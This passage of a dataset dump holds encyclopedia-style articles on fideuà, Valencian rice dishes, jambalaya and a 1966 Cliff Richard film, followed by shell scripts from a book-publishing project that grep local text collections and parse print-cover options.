(Gabrielo from a kiosk in the port district of Grau in Gandía), worked as a cook in a boat and Juan Bautista Pascual (Zábalo), was the youngest man in the boat and his assistant. According to Gabriel's family, the boat captain loved rice and the rest of sailors almost never received their full portion of arròs a banda, the dish that the cook usually prepared. Trying to find a solution for the problem, the cook had the idea of using noodles instead of rice to see if the result was a little less appetizing for the captain.\n\nThe invention was liked, and fame of the dish spread though harbor restaurants such as the \"Pastaora House,\" where they cooked the first \"fiduedades.\" The dish became distinctive and essential in the area.\n\n\n\n\n\n### Characteristics ##\n\nJust like paella, it is cooked in a special wide and flat frying pan, also called paella, although there are other traditional variants made in a casserole.\n\nGandia is the birthplace of fideuà, and in this city of La Safor region there is an annual competition-contest where the best cooks try to prepare the best fideuà.\n\n\n\n\n\n### Curiosities ##\n\nCurrently, various skill competitions for chefs are done in preparing fideuá.\n\n\n\n\n\n### See also ##\n\n\n\nList of seafood dishes\n\n\n\n\n\n### References ##\n\n\n\nes:Fideuà\n\n\n\n## Gata de Gorgos\n\n\n\nGata de Gorgos (Valencian: [ˈɡata ðe ˈɣoɾɣos], Spanish: [ˈɡata ðe ˈɣorɣos]) is a village in the Marina Alta region of the north Costa Blanca in Spain. It has a population of 5,325 (2005).\n\nThe village is known for its wicker industry and for having an unusually large number of bars and restaurants per capita. Boasting over 30 bars, the most popular are Ca Corder, which is located in the church square, and Ca Patrics, which is located in the Placa Nuevo.\n\nThe town's key fiestas take place during July to honour The Christ of the Calvary.(Fiestas en honor al Santísimo Cristo del Calvario). A key part of this event includes bull running along the street known as Paseo de Alicante - another is when the town's young men and women who are 'coming of age' form groups called 'Quintos' and march through the town accompanied by music and watched by family and friends. The highlight to many is the Paella Night, where most of the town congregate in the school to cook paella in the open air before being entertained by a local band.\n\n\n\n\n\n### References ##\n\n\n\n\n\n### External links ##\n\nWeb de l'Ajuntament de Gata\n\nThe Official Valencian Government Portal for events in Gata de Gorgos\n\nInstitut Valencià d'Estadística.\n\nPortal de la Direcció General d'Administració Local de la Generalitat.\n\nDiari Parlem.\n\nEl temps en Gata de Gorgos.\n\n\n\n## Valencian cuisine\n\n\n\nValencian cuisine is a Mediterranean cuisine as cooked in the Valencian Community, Spain. Its basic ingredients are vegetables, seafood and meat. It is famous worldwide for its rices, such as paella, and its citrus fruits. The cuisine of neighbouring regions have given and received important contributions from Valencian gastronomy, amongst them Balearic cuisine, Catalan cuisine, Aragonese cuisine, Manchego cuisine and Murcian cuisine.\n\n\n\n\n\n### Main dishes ##\n\n\n\nPaella. The most famous Valencian dish is one of the most recent. Although many towns claim to be the birthplace of paella, it is usually considered native to Albufera and Ribera, just south of Valencia. It can be found in two main varieties, with chicken and rabbit or with seafood. Nowadays paella can be found around the world and especially throughout Spain and Latin America. The name comes from the large pan ('paella' in Valencian) where it is cooked.\n\nArròs negre. Rice with squid and squid ink cooked in a paella.\n\nArròs al forn. A rice dish baked in the oven and usually containing sausages, chickpeas and potato amongst other ingredients, usually made with the surplus of the local typical stew.\n\nFideuà. A dish based on noodles and seafood, typical of the Valencian coast and originally from Gandia.\n\nArròs amb costra A kind of arròs al forn but covered with an egg which provides the \"crust\" in the name. It is typical of most of the south of Valencia and especially of Elche.\n\nGazpacho. A famous Spanish dish typical throughout south and central Spain. In the Valencia region it is typical of the southern and inland areas and is the quintessential summer dish.\n\nArròs a banda. A humble preparation typical of the Valencian coast with rice, fish, and sweet potato.\n\nEmbotits. Cured sausages.\n\nSobrassada a typically Majorcan meat-product which is produced in the Marina.\n\nBollit. Vegetable stew.\n\nSuquet de peix. An eel, potato, garlic and fish stew, similar to Bouillabaisse.\n\nAll i pebre. a signature dish for the area around Valencia city and immediately to the south, containing peppers, garlic and potatoes with eels.\n\nEsgarrat or Pericana in the mountains of Alcoi. It is a mixture of roasted peppers and strips of salted cod. The pericana also adds garlic.\n\nEspencat. Roasted vegetables, typically peppers and aubergine but other vegetables can be added.\n\nCoques. Ancient local salty pastries with a common origin with Italian Pizza.\n\n\n\n\n\n### Sauces ##\n\nAllioli. This is a thick sauce, common to most of the Western Mediterranean, based on mixing garlic and olive oil to which egg is sometimes added. It usually has a characteristic yellow colour.\n\nMullador. A sauce whose ingredients may vary but always includes tomatoes. The remaining ingredients depend on the time of year and the vegetables available in each area. There are similar preparations throughout the Mediterranean. Other names for this kind of sauce are \"samfaina\" in Catalonia, \"tomacat\" or \"tombet\" in Majorca and ratatouille in France; much simpler is the \"salsa napoletana\" in Italy. In Alcoi and further south, this sauce may include tuna as is the case with \"pisto\", typical of Castile la Mancha.\n\nPicada. This is a sauce composed of crushed nuts - usually almonds - olive oil, parsley and a little milk. It usually accompanies fish dishes.\n\n\n\n\n\n### Sweets, apéritifs, desserts and drinks ##\n\n\n\nPestinyos. A small, sweet and dry pastry folded into three and flavoured with orange and aniseed.\n\nPastissets, a typical sweet made of pastry with a sweet almond or sweet potato filling. It is of probable Arab origin and is typical of most of Valencia and the south of Catalonia. A similar dish, called rubiols, is typical in Majorca.\n\nArnadí typical of Xàtiva\n\nCoca (pastry). A kind of pizza or pie which can be either sweet or savoury. It is typical to most of Valencia as well as in the other territories of Catalan culture. The most common kinds in Valencia are the coca de llanda, a kind of sponge-cake, often pumpkin-, lemon- or apple-flavoured; coca de mullador - or coca de Sant Joan in Alicante - a small pizza-like pastry with ratatouille on top and occasionally tuna or other titbits; and coca de xulla, a flat bread with bacon and sausages on top. \"Coca de molletes\" typical of Alicante with soft salty flour crumbles.\n\nCoques de dacsa, originally from Ròtova near Gandia and commercially available in the area around Denia and Gandia. These are flat pastry bases similar to Mexican tortillas, and topped with all kinds of titbits such as mullador. A similar preparation are coques de mestall, from the neighbouring county Valldigna.\n\nArrop i tallaetes. A dessert which immerses fruit pieces in a sweet syrup made from grape must.\n\nFartons. These are pastry fingers designed to be dipped in orxata.\n\nOrxata (Horchata). A drink made from submerging rice or other products in water for long periods. There are at least two kinds made locally. The first is Orxata de Xufa, made with tigernuts, quintessentially Valencian and produced only in the area of Alboraya, just north of Valencia. The second is Orxata d'Ametlla, made and consumed in the Alicante and Xixona.\n\nPeladillas (Jordan almonds). Typical from Casinos.\n\nTorró. A kind of nougat, with strong tradition of Xixona and Alicante with, available in two styles, hard and soft.\n\nFigues albardaes (a kind of fig fritter that are traditional in Falles)\n\nBunyols. Yet another Arab-inspired pastry, these are dough-balls which are fried and covered with sugar, which can be found in various parts of Mediterranean Spain such as Cadaqués, as well as in Madrid or even Latin America although in these cases they are not sweet. The Valencian variety habitually includes pumpkin in the dough, though often in commercial preparations this is not so. They are typical of Falles.\n\n\n\n\n\n### Wines and liquors ##\n\nValencian wines are also well-regarded, with three Protected Designation of Origin: Alicante, Utiel-Requena and Valencia. In Utiel-Requena, champagne is made under the cava denomination. Meanwhile, muscat (known as \"moscatell\" also called \"mistela\") is produced in the Marina Alta (near Denia) under Alicante DO and also in Turís, Cheste, Godelleta and surroundings, under the Valencia DO.\n\n\n\n\n\n### See also ##\n\nArroz a la valenciana, a rice dish typical in Portugal and Latin America and inspired by paella.\n\n\n\n\n\n### External links ##\n\nOfficial tourist board guide to cuisine in the Land of Valencia\n\nValencian dishes\n\nLa cuina valenciana (Catalan)\n\n\n\n## Arroz a la valenciana\n\n\n\nArroz a la valenciana (Spanish) or Arroz à valenciana (Portuguese) is a typical Latin American dish which is also considered as a part of Filipino cuisine. In Chile and Nicaragua it is referred to as a Latin American version of Valencian paella.\n\n\n\n\n\n### Ingredients ##\n\nThe dish consists of one pound of glutinous rice or regular rice, chicken, chorizo, two ounces of butter, one onion, one red bell pepper, two tomatoes, a can of tomato paste, and salt and pepper to taste. It is usually prepared with beer, along with white wine.\n\n\n\n\n\n### Preparation ##\n\nTo prepare the dish, first the chicken is cooked in sufficient water, then onions, red bell pepper and salt are added. When it's finished the chicken is stripped and any bones are discarded. After comes the preparation of the rice where the chicken is then added and left to cook. Afterwards, in a frying pan, butter, onion, and red pepper are fried. Later the chicken and rice is added and mixed together along with sausage and the optional addition of beer or white wine.\n\n\n\n\n\n### See also ##\n\n\n\nList of chicken dishes\n\nList of rice dishes\n\nRelated dishes\n\nArroz con pollo\n\nArroz negro\n\nFideuà\n\nJambalaya\n\nPaella\n\nPilaf\n\nRisotto\n\n\n\n\n\n### References ##\n\n\n\n## Finders Keepers (1966 film)\n\n\n\nFinders Keepers is a 1966 British musical film directed by Sidney Hayers, written by Michael Pertwee and starring Cliff Richard. It was released in the U.S. the following year. A search was made to find an actress to play the Spanish girl who falls for Cliff. The 21-year-old Viviane Ventura won the role: born in London, but fluent in Spanish, she sang a spirited duet in the film with Cliff: Paella.\n\n\n\n\n\n### Plot ##\n\nCliff and The Shadows travel to a Spanish town for a gig. When they arrive they are puzzled to find the area empty. They find out that a small bomb has accidentally been dropped on the town and the villagers have fled in panic that it will go off. The boys decide to find the bomb and restore peace in the village, with some musical numbers along the way.\n\n\n\n\n\n### Cast ##\n\nCliff Richard - Cliff\n\nHank Marvin - Himself (as The Shadows)\n\nBruce Welch - Himself (as The Shadows)\n\nBrian Bennett - Himself (as The Shadows)\n\nJohn Rostill - Himself (as The Shadows)\n\nRobert Morley - Colonel Roberts\n\nPeggy Mount - Mrs. Bragg\n\nViviane Ventura - Emilia\n\nGraham Stark - Burke\n\nJohn Le Mesurier - Mr. X\n\nEllen Pollock - Grandma\n\nErnest Clark - Air Marshal\n\nBurnell Tucker - Pilot\n\nGeorge Roderick - Priest\n\nBill Mitchell - G.I. Guard\n\nRobert Hutton - Commander\n\n\n\n\n\n### Critical reception ##\n\nThe Radio Times described the film as a \"dismal romp\" which \"marked the end of Cliff's screen collaboration with the Shadows\"; while Variety wrote, \"Michael Pertwee’s screenplay does not build up much urgency or suspense but provides opportunity for colorful fiesta, a gentle romance between Richard and Ventura, some verbal dueling between Robert Morley and Graham Stark\"; and Sky Movies noted, \"Peggy Mount and Robert Morley (For ##10,000, I'd walk naked down Horse Guards Parade') provide formidable comedy support for the stars.\" \n\n\n\n\n\n### Music ##\n\nMusic and lyrics by The Shadows. Songs include: \"Finders Keepers,\" \"Washerwoman,\" \"My Way,\" \"Paella,\" \"La, La, La,\" \"Fiesta,\" and \"Time Drags By.\"\n\n\n\n\n\n### Soundtrack ##\n\nThe soundtrack album for Finders Keepers by Cliff Richard and The Shadows was released on Columbia Records (Columbia SCX 6079)\n\n\"Finders Keepers\" (Cliff Richard and The Shadows)\n\nTime Drags By (Cliff Richard and The Shadows)\n\nWasherwoman (Cliff Richard and The Shadows)\n\nLa La La song (Cliff Richard and The Shadows)\n\nMy Way (The Shadows)\n\nOh Senorita (Cliff Richard and The Shadows)\n\nSpanish Music (The Shadows)\n\nFiesta (Cliff Richard and The Shadows)\n\nThis Day (Cliff Richard and The Shadows)\n\nPaella (Cliff Richard and The Shadows)\n\nFinders Keepers/My Way/Paella/Fiesta (Medley) (The Shadows)\n\nRun to the Door (not from the film)\n\nWhere Did the Summer Go (not from the film)\n\nInto Each Life Some Rain Will Fall (Cliff Richard and The Shadows) (not from the film)\n\n\n\n\n\n### Tagline ##\n\nThe film's tagline is 'The beat is the wildest! The blast is the craziest!... and the fun is where you find it!'\n\nThe film is rated M in New Zealand for sexual references.\n\n\n\n\n\n### References ##\n\n\n\n\n\n### External links ##\n\nFinders Keepers at the Internet Movie Database\n\n\n\n## Arroz con pollo\n\n\n\nArroz con pollo (rice with chicken) is a traditional dish of Spain and Latin America, closely related to paella. In the Dominican Republic it is called locrio de pollo, and in Saint Martin it is called lokri or locreo.\n\nThere is some debate as to whether it originated in Spain. Puerto Ricans consider it one of their classic recipes. Many Puerto Ricans note that arroz con pollo cannot be made without beer and annatto oil and saffron is no substitute. Beer and annatto are rarely used in Spanish cooking and never in arroz con pollo there. Annatto is frequently used in Puerto Rican cooking especially in rice dishes like arroz con gandules (rice with pork and pigeon peas) and arroz con maiz (rice with corn and sausage). Beer is used in many Puerto Rican dishes like pollo guisado (braised stewed chicken) and asopao de pollo (chicken rice stew). Arroz con pollo and most Puerto Rican rice dishes are highly seasoned with sofrito, which is another key ingredient in arroz con pollo.\n\nFood writer Elisabeth Lambert Ortiz, pointing out the international aspects of the dish, notes the origin of Arroz con Pollo in the Spanish forms of pilaf, already reflecting international influences: chicken was brought from India and rice from Asia; saffron (used for the yellow colour in Spain, instead of annatto) was introduced by Phoenician traders; tomatoes and peppers (also known as sofrito) are natives of the Americas.\n\n\n\n\n\n### See also ##\n\nArroz caldo\n\nBiryani\n\nCabidela\n\nChicken and rice (disambiguation)\n\nList of chicken dishes\n\nList of rice dishes\n\n\n\n\n\n### References ##\n\n\n\n\n\n### External links ##\n\n\n\n## Arròs a banda\n\n\n\nArròs a banda (Valencian term for rice in a side, translated as Arroz a banda in Spanish) is a dish of rice cooked in fish stock, typical of the coastal area of Alicante (and, per extension, in most of Land of Valencia), Spain, and distinct from the paella of Valencia. It is popular up to Garraf, Barcelona (Catalonia) and down to Murcia (Region of Murcia).\n\nIt originated with the fishermen of Alicante, who sold off their best fish and kept the leftovers for stock, used to cook the rice. It is usually served with alioli.\n\n\n\n\n\n### References ##\n\nhttp://www.spanish-food.org/rice-and-pasta-arroz-a-banda.html\n\n\n\n## Jambalaya\n\n\n\nJambalaya (/ˌdʒʌmbəˈlaɪ.ə/ JUM-bə-LY-ə) is a Louisiana Creole dish of Spanish and French (especially Provençal) influence. It consists of meat and vegetables mixed with rice. Traditionally, the meat always includes sausage of some sort, often a smoked sausage such as Andouille, along with some other meat or seafood, frequently pork, chicken, crayfish, or shrimp. The vegetables are usually a sofrito-like mixture known as the \"holy trinity\" in Creole and Cajun cooking, consisting of onion, celery, and green bell pepper, though other vegetables such as carrots, tomatoes, chilis, and garlic are also used. After browning and sauteeing the meat and vegetables, rice, seasonings, and broth are added and the entire dish is cooked together until the rice is done.\n\nJambalaya is similar to (but distinct from) other rice-and-meat dishes known in Louisiana cuisine. Gumbo uses similar sausages, meats, seafood, vegetables and seasonings, however gumbo includes filé powder and okra, which are not common in jambalaya. Gumbo is also usually served over white rice, which is prepared separate from the rest of the dish, unlike jambalaya, where the rice is prepared with the other ingredients. Étouffée is a stew which always includes shellfish such as shrimp or crayfish, but does not have the sausage common to jambalaya and gumbo. Also, like gumbo, étouffée is usually served over separately prepared rice.\n\nJambalaya has its origins in several rice-based dishes well attested in the Mediterranean cuisines of Spain and France, especially in the Spanish dish paella (native to Valencia) and the French dish known as jambalaia (native to Provence). Other seasoned rice-based dishes from other cuisines include pilaf, risotto and Hoppin' John.\n\n\n\n\n\n### Varieties ##\n\n\n\nThere are two primary methods of making jambalaya, differentiated by the presence or absence of tomatoes.\n\nThe first and most common is the city Creole jambalaya (also called \"red jambalaya\"). First, meat is added to the trinity of celery, peppers, and onions; the meat is usually chicken and sausage such as andouille or smoked sausage. Next vegetables and tomatoes are added to cook, followed by seafood. Rice and stock are added in equal proportions at the very end. The mixture is brought to a boil and left to simmer for 20 to 60 minutes, depending on the recipe, with infrequent stirring. Towards the end of the cooking process, stirring usually ceases. Some versions call for the jambalaya to be baked after the cooking of all the ingredients.\n\nThe second style, more characteristic of southwestern and south-central Louisiana, is rural Creole jambalaya, which contains no tomatoes (the idea being the farther away from New Orleans one gets, the less common tomatoes are in dishes). The meat is browned in a cast-iron pot. The bits of meat that stick to the bottom of the pot (sucs) are what give a rural jambalaya its brown color. A little vegetable oil is added if there is not enough fat in the pot. The trinity (of 50% onions, 25% celery, and 25% green or red bell pepper, although proportions can be altered to suit one's taste) is added and sautéed until soft. Stock and seasonings are added in the next step, and then the meats are returned to the pot. This mixture is then simmered, covered, for at least one hour. Lastly, the mixture is brought to a boil and rice is added to the pot. It is then covered and left to simmer over very low heat for at least 1/2 hour without stirring. The dish is finished when the rice has cooked.\n\nA third method is less common, the \"Cajun\" jambalaya. In this version, meat and vegetables are cooked separately from the rice. At the same time, rice is cooked in a savory stock. It is added to the meat and vegetables before serving. This is called \"white jambalaya.\" This dish is rare in Louisiana as it is seen as a \"quick\" attempt to make jambalaya, popularized outside the state to shorten cooking time.\n\nMany people in the south, and typically in Louisiana, enjoy a simpler Jambalaya style. This style is cooked the same as the rural style, but there are no vegetables. Many restaurants serve this style as opposed to the others, because it is more child-friendly, has a more consistent texture, and is easier to make.\n\nJambalaya is considered by most Louisianans to be a filling but simple-to-prepare rice dish; gumbos, étouffées, and creoles are considered more difficult to perfect. Most often a long grain white rice is used in making jambalaya.\n\nJambalaya is differentiated from gumbo and étouffée by the way in which the rice is included. In these dishes, the rice is cooked separately and is served as a bed on which the main dish is served. In the usual method of preparing jambalaya, a rich stock is created from vegetables, meat, and seafood; raw rice is then added to the broth and the flavor is absorbed by the grains as the rice cooks.\n\n\n\n\n\n### History ##\n\n\n\nCreole jambalaya originates from the French Quarter of New Orleans, in the original European sector. It was an attempt by the Spanish to make paella in the New World, where saffron was not readily available due to import costs. Tomatoes became the substitute for saffron. As time went on, French influence became strong in New Orleans, and spices from the Caribbean changed this New World paella into a unique dish. In modern Louisiana, the dish has evolved along a variety of different lines. Creole jambalaya, or red jambalaya, is found primarily in and around New Orleans, where it is simply known as 'jambalaya'. City Creole jambalaya includes tomatoes, whereas rural jambalaya does not.\n\nRural Jambalaya originates from Louisiana's rural, low-lying swamp country where crawfish, shrimp, oysters, alligator, duck, turtle, boar, venison, nutria and other game were readily available. Any variety or combination of meats, including chicken or turkey may be used to make jambalaya. Rural jambalaya is known as 'Brown jambalaya' in the New Orleans area; to rural Creoles it is simply known as 'jambalaya.' Rural jambalaya has more of a smoky and spicy flavor than its cousin jambalaya. The French Creoles of couleur introduced jambalaya to the Cajuns.\n\n\n\nThe first appearance in print of any variant of the word 'jambalaya' in any language occurred in Leis amours de Vanus; vo, Lou paysan oou théâtré, by Fortuné (Fortunat) Chailan, first published in Provençal dialect in 1837. The earliest appearance of the word in print in English occurs in the May 1849 issue of the American Agriculturalist, page 161, where Solon Robinson refers to a recipe for 'Hopping Johnny (jambalaya)'. Jambalaya did not appear in a cookbook until 1878, when The Gulf City Cook Book, by the ladies of the St. Francis Street Methodist Episcopal Church, was printed in South Mobile, Alabama. It contains a recipe for \"JAM BOLAYA\".\n\nJambalaya experienced a brief jump in popularity during the 1920s and 1930s because of its flexible recipe. The dish was little more than the rice and vegetables the populace could afford, but the recipe grew from humble roots.\n\nIn 1968, Louisiana Governor John J. McKeithen proclaimed Gonzales, Louisiana, the Jambalaya Capital of the World. Every Spring, the annual Jambalaya Festival is held in Gonzales.\n\n\n\n\n\n### Etymology ##\n\nThe Oxford English Dictionary indicates that 'jambalaya' comes from the Provençal word 'jambalaia', meaning a mish mash, or mixup, and also meaning a pilau (pilaf) of rice. This is supported by the fact that the first printed appearance of the word is in a Provençal poem published in 1837.\n\n\n\nAnother popular source suggests that the word comes from the Spanish 'jamón' (\"ham\") + 'paella', a noted Spanish rice dish. However, the evidence for this idea is also thin. Again, ham is not a featured element of the dish, and Spanish speakers would call a ham paella 'paella con jamón', not 'jamón paella.'\n\nThe Dictionary of American Food and Drink offers this creative old wives' tale about the origin of the word:\n\n\n\nLate one evening a traveling gentleman stopped by a New Orleans inn which had little food remaining from the evening meal. The traveler instructed the cook, \"Jean, balayez!\" or \"Jean, sweep something together!\" in the local dialect. The guest pronounced the resulting hodge-podge dish as \"Jean balayez.\"\n\n\n\nThe Atakapa tribe states the origin of the name. The original word \"Sham, pal ha! Ya!\" means \"Be full, not skinny! Eat Up!\" with a French equivalent of \"Bon appétit!\". Spanish influence resulted in the current spelling of the name.\n\n\n\n\n\n### See also ##\n\n\n\nList of regional dishes of the United States\n\nSimilar dishes:\n\n\n\n\n\n### References ##\n\n\n\n\n\n### External links ##\n\nChronology of all early mentions of Jambalaya in print.\n\n \n \n" }, { "alpha_fraction": 0.6945578455924988, "alphanum_fraction": 0.6961451172828674, "avg_line_length": 61.112674713134766, "blob_id": "0be2bc97fe67d168240be4feaa47b89225cf5e6d", "content_id": "dada75ceadc5a5bb4a43883d660450689e455c9c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4410, "license_type": "permissive", "max_line_length": 137, "num_lines": 71, "path": "/scripts/includes/search-content-collections.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo \"$content_collections\" | sed -e 's/; /;/g' -e 's/;/\\n/g' > \"$TMPDIR$uuid/content_collections/content_collections_list\"\necho -n \"searching the following content collections: \"\ncat \"$TMPDIR$uuid/content_collections/content_collections_list\"\necho \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\necho \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n\necho \"# Local Data\" > \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\necho \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\necho \"searches carried out at $(date -u)\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\necho \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n\nwhile IFS= read -r collection; do\n mkdir \"$TMPDIR$uuid/content_collections/$collection\"\n . \"$LOCAL_DATA\"content_collections/\"$collection/$collection.cfg\"\n\n echo \"# $content_collection_name\" > \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \"\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \"\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n\n while IFS= read -r seed; do\n echo \"now searching $collection on $seed\"\n echo \"## **\"$seed\"**\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \"\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n\n case $content_collection_filetype in\n pdf)\n echo \"ccf filetype is pdf\"\n grep -h -r -l -w \"$seed\" \"$LOCAL_DATA\"content_collections/\"$content_collection_dirname\" | while read fn\n do\n #echo \"**$fn**\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n #echo \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n #pdfgrep \"$seed\" -r -h -C 120 \"$fn\" | uniq | sed G >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n #echo \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \"pdfgrep search not implemented in search-content-collections\"\n done\n ;;\n txt)\n echo \"using grep against txt files in collection\"\n echo $content_collection_dirname\n grep -h -r -l -w \"$seed\" \"$LOCAL_DATA\"content_collections/\"$content_collection_dirname\" >> \"$TMPDIR$uuid/content_collections/files\"\n grep -r -l \"$seed\" \"$LOCAL_DATA\"content_collections/\"$content_collection_dirname\" | while read fn\n do\n echo \"*$fn*\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n grep \"$seed\" --no-group-separator -h -w -A 2 -B 2 \"$fn\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n done\n ;;\n *)\n echo \"assuming files in collection are txt and running grep\"\n grep -h -r -l -w \"$seed\" \"$fn\" \"$LOCAL_DATA\"content_collections/\"$content_collection_dirname\" | while read fn\n do\n echo \"**$fn**\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n grep \"$seed\" --no-group-separator -hw -A 2 -B 2 \"$fn\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n done\n ;;\n esac\n echo \"\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \"\" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n\n done < \"$TMPDIR\"$uuid\"/seeds/sorted.seedfile\"\n\n echo \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n echo \" \" >> \"$TMPDIR$uuid/content_collections/content_collections_results.md\"\n sed -i 's/----//g' \"$TMPDIR$uuid/content_collections/content_collections_results.md\" #hack to remove confusing markdown from gutenberg\n sed -i 's/<<<//g' \"$TMPDIR$uuid/content_collections/content_collections_results.md\" #hack to remove confusing markdown from gutenberg\n echo \"$content_collection_citation\" >> \"$TMPDIR$uuid/content_collections/content_sources.md\"\n echo \" \" >> \"$TMPDIR$uuid/content_collections/content_sources.md\"\ndone < \"$TMPDIR$uuid/content_collections/content_collections_list\"\n" }, { "alpha_fraction": 0.6875585913658142, "alphanum_fraction": 0.7069689631462097, "avg_line_length": 30.886865615844727, "blob_id": "1d1f5f25dde84344115280d2b306deeaa525824d", "content_id": "da5488948cb7ad1250e0a4e655aef2002e4c0b94", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 24523, "license_type": "permissive", "max_line_length": 354, "num_lines": 769, "path": "/scripts/standalone-print.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n. ../conf/config.txt\n\nuuid=$(python -c 'import uuid; print uuid.uuid1()')\necho \"stand-alone uuid for this instance is\" $uuid | tee --append $sfb_log\n\n# echo \"launched standalone print\" | tee --append /opt/bitnami/apache2/htdocs/pk-new/development/scripts/success # debugging command\n\n# command line parser\n\n# process command line\n\n#!/bin/sh\n# (POSIX shell syntax)\n\n# Reset all variables that might be set\n\n# this is for case bound only - most of these values would need to be conditional to support other bindings\n\n\tprint_horizontal_trim=1538 # 2438 8.125 inches for 8.5 inch books \n\tprint_vertical_trim=2550 # 3300 for 11 inch\n\tprint_top_height=$((print_vertical_trim / 4 - 50))\n\tprint_bottom_height=$((print_vertical_trim / 10))\n\tprint_label_text_width=$((print_horizontal_trim - 225))\n\tbottom_label_top_edge=$((print_vertical_trim - print_bottom_height - print_bottom_height))\n\toutsidebleed=187\n\tinsidebleed=204\n\ttopbleed=217\n\tbottombleed=225\n\ttextsafety=150\n\tcovercolor=`shuf -n 1 ../conf/print-cover-colors.txt`\n\tcoverfontcolor=\"White\"\n\tcoverfont=`shuf -n 1 ../conf/print-cover-fonts.txt`\n\tcovertype=\"wordcloud\"\n\timprintname=\"PageKicker\"\n\timprintlogo=\"assets/purplebird300.png\"\n\nwhile :\ndo\n case $1 in\n -h | --help | -\\?)\n \t# Call your Help() or usage() function here.\n \t exit 0 # This is not an error, User asked help. Don't do \"exit 1\"\n \t;;\n -I | --ISBN)\n \t userprovidedprintISBN=$2 # You might want to check if you really got FILE\n \t shift 2\n \t ;;\n --ISBN=*)\n \t userprovidedprintISBN=${1#*=} # Delete everything up till \"=\"\n \tshift\n \t ;;\n\t-t | --covertitle)\n\t\tcovertitle=$2\n\t\tshift 2\n\t\t;;\n\t--covertitle=*)\n\t\tcovertitle=${1#*=}\n\t\tshift\n\t\t;;\n\t-T | --shorttitle)\n\t\tshorttitle=$2\n\t\tshift 2\n\t\t;;\n\t--shorttitle=*)\n\t\tshorttitle=${1#*=}\n\t\tshift\n\t\t;;\n\t-e | --editedby)\n\t\teditedby=$2\n\t\tshift 2\n\t\t;;\n\t--editedby=*)\n\t\teditedby=${1#*=}\n\t\tshift\n\t\t;;\n\t-s | --spinepixels)\n\t\tspinepixels=$2\n\t\tshift 2\n\t\t;;\n\t--spinepixels=*)\n\t\tspinepixels=${1#*=}\n\t\techo $spinepixels\n\t\tspinepixels=$(( echo $spinepixels ))\n\t\techo $spinepixels\n\t\tshift\n\t\t;;\n\t-p | --pdfpath)\n\t\tpdfpath=$2\n\t\tshift 2\n\t\t;;\n\t--pdfpath=*)\n\t\tpdfpath=${1#*=}\n\t\tshift\n\t\t;;\n\t--c | --covercolor)\n\t\tcovercolor=$2\n\t\tshift 2\n\t\t;;\n\t--covercolor=*)\n\t\tcovercolor=${1#*=}\n\t\tshift\n\t\t;;\n\t-f | --coverfont)\n\t\tcoverfont=$2\n\t\tshift 2\n\t\t;;\n\t--coverfont=*)\n\t\tcoverfont=${1#*=}\n\t\tshift\n\t\t;;\t\n\t-T | --covertype)\n\t\tcovertype=$2\n\t\tshift 2\n\t\t;;\n\t--covertype=*)\n\t\tcovertype=${1#*=}\n\t\tshift\n\t\t;;\n\t--userimage)\n\t\tuserimage=$2\n\t\tshift 2\n\t\t;;\n\t--userimage=*)\n\t\tuserimage=${1#*=}\n\t\tshift\n\t\t;;\n\t--usercaption)\n\t\tusercaption=$2\n\t\tshift 2\n\t\t;;\n\t--usercaption=*)\n\t\tusercaption=${1#*=}\n\t\tshift\n\t\t;;\n\t--imprintname)\n\t\timprintname=$2\n\t\tshift 2\n\t\t;;\n\t--imprintname=*)\n\t\timprintname=${1#*=}\n\t\tshift\n\t\t;;\n\t--spineinches)\n\t\tspineinches=$2\n\t\tshift 2\n\t\t;;\n\t--spineinches=*)\n\t\tspineinches=$(1#*=}\n\t\tshift\n\t\t;;\n\t--print_vertical_trim)\n\t\tprint_vertical_trim=$2\n\t\tshift 2\n\t\t;;\n\t--print_vertical_trim=*)\n\t\tprint_vertical_trim=${1#*=}\n\t\tshift\n\t\t;;\n\t--print_horizontal_trim)\n\t\tprint_horizontal_trim=$2\n\t\tshift 2\n\t\t;;\n\t--print_horizontal_trim)\n\t\tprint_horizontal_trim=${1#*=}\n\t\tshift\n\t\t;;\n\t--coverfontcolor)\n\t\tcoverfontcolor=$2\n\t\tshift 2\n\t\t;;\n\t--coverfontcolor)\n\t\tcoverfontcolor=${1#*=}\n\t\tshift\n\t\t;;\n\t--pdfx1a)\n\t\tpdfx1a=$2\n\t\tshift 2\n\t\t;;\n\t--pdfx1a)\n\t\tpdfx1a=${1#*=}\n\t\tshift\n\t\t;;\n --trimsize)\n\t\ttrimsize=$2\n\t\tshift 